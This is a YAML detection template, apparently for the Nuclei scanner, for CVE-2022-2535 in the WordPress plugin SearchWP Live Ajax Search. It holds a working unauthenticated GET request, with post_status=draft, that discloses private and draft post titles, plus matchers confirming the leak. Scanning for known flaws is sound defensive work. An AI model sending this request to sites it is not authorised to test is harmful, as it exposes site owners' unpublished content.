44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2022-2535
|
|
|
|
info:
|
|
name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
|
|
remediation: Fixed in version 1.6.2
|
|
reference:
|
|
- https://wpscan.com/vulnerability/0e13c375-044c-4c2e-ab8e-48cb89d90d02
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2535
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-2535
|
|
cwe-id: CWE-639
|
|
epss-score: 0.00271
|
|
epss-percentile: 0.6434
|
|
cpe: cpe:2.3:a:searchwp:searchwp_live_ajax_search:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: searchwp
|
|
product: searchwp_live_ajax_search
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/searchwp-live-ajax-search/"
|
|
tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "searchwp-live-search-result")'
|
|
condition: and
|
|
|
|
# digest: 490a00463044022037dc5b0309791462b7403219edfd53231e5d7c9a43e3f6670518b0c0ec59ad3c0220058ab06c28cbfdc59a40a8ac89ead24f243302076c05b256c2601e38baa1823d:922c64590222798bb761d5b6d8e72950
|